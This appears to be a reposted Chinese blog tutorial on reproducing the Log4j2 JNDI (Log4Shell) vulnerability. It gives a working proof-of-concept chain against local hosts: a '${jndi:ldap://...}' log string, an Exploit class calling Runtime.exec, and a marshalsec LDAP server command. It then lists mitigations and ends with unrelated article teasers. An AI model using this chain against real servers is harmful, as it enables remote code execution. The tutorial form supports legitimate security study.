千万别中招!手把手教你复现Log4j2漏洞!
Java研发军团
共 320字,需浏览 1分钟
· 2021-12-18
来源:https://blog.csdn.net/qq_40989258/article/details/121862363
| 简介
| 漏洞概述
| 影响范围
Apache Log4j 2.x <= 2.15.0-rc1
| 环境搭建
<dependency>
<groupId>org.apache.logging.log4jgroupId>
<artifactId>log4j-coreartifactId>
<version>2.14.1version>
dependency>
| 漏洞利用
1 使用POC测试
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
public static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
logger.error("${jndi:ldap://localhost:8888/Exploit}");
}
}
首先新建exp.java,然后编译为class文件。
class Exploit {
static {
System.err.println("Pwned");
try {
String cmds = "calc";
Runtime.getRuntime().exec(cmds);
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
javac exp.java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888
https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2
| 修复方式
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true; 在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true; JDK使用11.0.1、8u191、7u201、6u211及以上的高版本; 部署使用第三方防火墙产品进行安全防护。
END
推荐阅读 一键生成Springboot & Vue项目!【毕设神器】
Java可视化编程工具系列(一)
Java可视化编程工具系列(二)
顺便给大家推荐一个GitHub项目,这个 GitHub 整理了上千本常用技术PDF,绝大部分核心的技术书籍都可以在这里找到,
GitHub地址:https://github.com/javadevbooks/books
Gitee地址:https://gitee.com/javadevbooks/books
电子书已经更新好了,你们需要的可以自行下载了,记得点一个star,持续更新中..
评论
教你如何在 Linux 系统中查看系统日志
转自:开源LinuxLinux 系统提供了强大的日志功能,可以记录系统和应用程序的各种事件和错误信息。系统日志对于故障排除和性能监控非常重要。一、使用命令行工具查看系统日志1. 使用 journalctl 命令查看系统日志:journalctl 命令是 systemd 日志管理器的客户端工具,它可以
良许Linux
0
贾佳亚团队新模型对标ChatGPT+DALL-E 3王炸组合!读懂梗图刷爆榜单,代码复现数学函数
来源:新智元【导读】贾佳亚团队提出VLM模型Mini-Gemini,堪比GPT-4+DALL-E 3王炸组合,一上线就刷爆了多模态任务榜单!读得懂梗图,做得了学术,用代码就能复现数学函数图。刷爆多模态任务榜单,超强视觉语言模型Mini-Gemini来了!效果堪称是开源社区版的GPT-4+DALL-E
AI算法与图像处理
10
从0到1 | 手把手教你部署 AI 大模型
点击蓝字 关注我们Build with AI 南京活动来啦!现已开启报名!跟随技术老师的脚步,利用一个下午的时间,部署 AI 大模型!席位有限,速速报名~联合主办方现场福利参会现场可领取夜光运动手环现场完成挑战即可获得运动时尚挎包报名方式请扫码填写问卷报名,名额有限,先到先得!活动信息「活动」:从0
Datawhale
10
实战|手把手教你用Python爬虫(附详细源码)
作者通常周更,为了不错过更新,请点击上方“ Python碎片 ”,“ 星标 ”公众号 什么是爬虫? 实践来源于理论,做爬虫前肯定要先了解相关的规则和原理,要知道互联网可不是法外之地,你一顿爬虫骚操作搞不好哪天就... 首...
Python 碎片
0
教你一招,保护你的项目代码!
大家好,我是程序员鱼皮,今天分享一个团队开发的小知识。团队开发时,我们一般会使用 GitHub 等代码托管平台来维护项目的代码。比如我们公司的每个项目,都在 GitHub 上有对应的代码库。GitHub 上的代码库,可以设...
程序员鱼皮
0
手把手教你做AI产品经理
ChatGPT的爆火,让人看到了新的生产力发展方向,微软也因此放弃了元宇宙,ALL In AI,各大巨头和资本也陆续进入,誓要打造中国版的ChatGPT,并觉得人工智能可以改写现有的程序应用场景,带来新的生产力变革。一位长...
产品刘
0
雷神众测漏洞周报2024.3.11-2024.3.17
摘要 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修改和解释权。如欲转载或传...
雷神众测
0
程序员缺乏经验的 7 种表现,你中招没?
目录 一次性提交大量代码 代码写的很烂 同时开展多项工作 性格傲慢 不能从之前的错误中学到经验 工作时间处理私人事务 盲目追逐技术潮流 知道这些表现,你才能在自己的程序员职业生涯中不犯相同的错误。 软件行业的...
Java专栏
0